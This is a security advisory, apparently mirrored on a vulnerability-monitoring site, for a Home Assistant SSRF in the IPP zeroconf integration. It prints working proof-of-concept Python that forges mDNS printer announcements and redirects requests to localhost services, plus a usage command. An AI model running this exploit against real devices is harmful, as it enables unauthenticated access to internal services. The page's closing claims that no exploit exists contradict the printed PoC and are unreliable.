Know every vulnerabilitybefore it knows you.
DevGuard continuously monitors your dependencies and alerts you when CVEs like this one affect your stack — with real-time threat intelligence built for developers.
GHSA-4ghv-53cq-7wp3
Summary
Home Assistant Green is vulnerable to a Server-Side Request Forgery (SSRF) via the mDNS/Zeroconf IPP integration. An unauthenticated attacker on the local network can send a crafted mDNS response to trick Home Assistant into making HTTP requests to arbitrary hosts, including internal services bound to localhost. The IPP integration automatically processes _ipp._tcp.local service announcements without any user interaction or authentication, and follows HTTP redirects from the attacker-controlled host.
Details
Home Assistant listens for mDNS service announcements on port 5353. When a service of type _ipp._tcp.local is discovered, the IPP integration's zeroconf handler (homeassistant/components/ipp/config_flow.py) processes it automatically.
The async_step_zeroconf method extracts host, port, and base_path directly from the mDNS discovery info without validation:
async def async_step_zeroconf(
self, discovery_info: ZeroconfServiceInfo
) -> ConfigFlowResult:
host = discovery_info.host
port = discovery_info.port
zctype = discovery_info.type
name = discovery_info.name.replace(f".{zctype}", "")
tls = zctype == "_ipps._tcp.local."
base_path = discovery_info.properties.get("rp", "ipp/print")
self.discovery_info.update(
{
CONF_HOST: host,
CONF_PORT: port,
CONF_SSL: tls,
CONF_VERIFY_SSL: False,
CONF_BASE_PATH: f"/{base_path}",
CONF_NAME: name,
CONF_UUID: unique_id,
}
)
These values are then passed to validate_input(), which constructs an HTTP request (IPP over HTTP) to the attacker-controlled host:
async def validate_input(hass: HomeAssistant, data: dict) -> dict[str, Any]:
session = async_get_clientsession(hass)
ipp = IPP(
host=data[CONF_HOST],
port=data[CONF_PORT],
base_path=data[CONF_BASE_PATH],
tls=data[CONF_SSL],
verify_ssl=data[CONF_VERIFY_SSL],
session=session,
)
printer = await ipp.printer()
return {CONF_SERIAL: printer.info.serial, CONF_UUID: printer.info.uuid}
The core issue is that during the intentional discovery and retrieval of additional device information, the HTTP session blindly follows redirects. This allows an attacker to point the request at 127.0.0.1 or other internal services that are not otherwise network-accessible.
An attacker crafts an mDNS response advertising a fake IPP printer that points to the attacker's IP. The attacker's HTTP server then responds with a 302 redirect to any internal endpoint, causing Home Assistant to make the request on the attacker's behalf.
PoC
The PoC demonstrates the SSRF by sending a crafted mDNS response that causes Home Assistant to connect to the attacker's HTTP server, which redirects the request to an internal service.
Prerequisites
- Attacker machine on the same local network as the Home Assistant Green device
- Python 3 with dependencies:
pip install -r requirements.txt
Exploit Code
The core mDNS spoofing function builds and sends a DNS response advertising a fake IPP printer:
def build_dns_response(service_name, service_type, attacker_ip, attacker_port):
transaction_id = 0x0000 # mDNS always 0
flags = 0x8400 # Standard response, authoritative answer
qdcount = 0
ancount = 4 # 4 answers (service_type, SRV, TXT, A)
nscount = 0
arcount = 0
SRV = service_name + '.' + service_type
header = struct.pack("!HHHHHH", transaction_id, flags, qdcount, ancount, nscount, arcount)
def encode_name(name):
parts = name.split(".")
out = b""
for p in parts:
out += bytes([len(p)]) + p.encode("utf-8")
out += b"\x00"
return out
answers = b""
# PTR record: _ipp._tcp.local -> meomeo._ipp._tcp.local
answers += encode_name(service_type)
answers += struct.pack("!HHI", 12, 1, 1)
target = encode_name(SRV)
answers += struct.pack("!H", len(target)) + target
# SRV record
answers += encode_name(SRV)
answers += struct.pack("!HHI", 33, 1, 120)
srv_data = struct.pack("!HHH", 0, 0, attacker_port) + encode_name("hihiabcdmeomeo.local")
answers += struct.pack("!H", len(srv_data)) + srv_data
# TXT record
txt_strs = [b"abcd=efgh"]
txt_record = b"".join(bytes([len(s)]) + s for s in txt_strs)
answers += encode_name(SRV)
answers += struct.pack("!HHI", 16, 1, 120)
answers += struct.pack("!H", len(txt_record)) + txt_record
# A record: hihiabcdmeomeo.local -> attacker IP
answers += encode_name("hihiabcdmeomeo.local")
answers += struct.pack("!HHI", 1, 1, 120)
ip_bytes = socket.inet_aton(attacker_ip)
answers += struct.pack("!H", len(ip_bytes)) + ip_bytes
return header + answers
def send_mdns_response(service_name, service_type, has_ip, attacker_ip, attacker_port):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
packet = build_dns_response(service_name, service_type, attacker_ip, attacker_port)
sock.sendto(packet, (has_ip, 5353))
The attacker's HTTP server redirects the incoming IPP request to an internal service:
class RedirectHandler(BaseHTTPRequestHandler):
def do_POST(self):
self.send_response(302)
self.send_header("Location", "http://127.0.0.1:<INTERNAL_PORT>/<path>")
self.end_headers()
Usage
python3 zeroconf.py -type _ipp._tcp.local -has_ip <HOME_ASSISTANT_IP> -attacker_ip <ATTACKER_IP> -name meomeo
Exploit Flow
- The script starts an HTTP server on port 8000 that responds with a 302 redirect to an internal service
- A crafted mDNS response is sent to Home Assistant, advertising a fake IPP printer pointing to the attacker's IP and port 8000
- Home Assistant's IPP integration automatically discovers the "printer" and connects to the attacker's HTTP server
- The attacker's server responds with a 302 redirect to
http://127.0.0.1:<port>/<path> - Home Assistant follows the redirect, making a request to the internal service on the attacker's behalf
Impact
An unauthenticated attacker on the same local network can coerce Home Assistant into issuing HTTP requests to arbitrary hosts, including services bound to 127.0.0.1 or other internal addresses that are not otherwise reachable. Exploitation requires no user interaction and no prior IPP configuration — the IPP integration processes _ipp._tcp.local announcements automatically, and the HTTP client used to fetch printer metadata follows attacker-supplied redirects.
Mitigations
The shared aiohttp client used by integrations now blocks cross-origin redirects to internal addresses: when a request to a non-loopback host is redirected to a loopback or unspecified address, the redirect is refused and an error is raised instead of being followed. The check matches both literal hostnames (localhost and its subdomains) and hostnames that resolve to a loopback IP, so DNS-based bypasses are covered. Relative redirects, non-network URI schemes, and requests that already target loopback (legitimate local integrations) are unaffected.
Acknowledgements
Discovered by ZDI (ZDI-CAN-28336)
Upload your own SBOM in CycloneDX 1.6 or higher (JSON) directly here to check your vulnerabilities.
Drag and drop some file here, or click to select
The vulnerability can be exploited over a local network, such as Wi-Fi. It is easy for an attacker to exploit this vulnerability. An attacker does not need any special privileges or access rights. No user interaction is needed for the attacker to exploit this vulnerability. The impact is confined to the system where the vulnerability exists. There is a low impact on the confidentiality of the information. There is a low impact on the integrity of the data.
Exploitation attempts have been detected. Elevated vigilance and prompt remediation are advised.
The exploit probability is very low. The vulnerability is unlikely to be exploited in the next 30 days.
We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.
Browse More
Continuously monitor your dependencies and get alerted when vulnerabilities like this one affect your stack.
Checkout DevGuard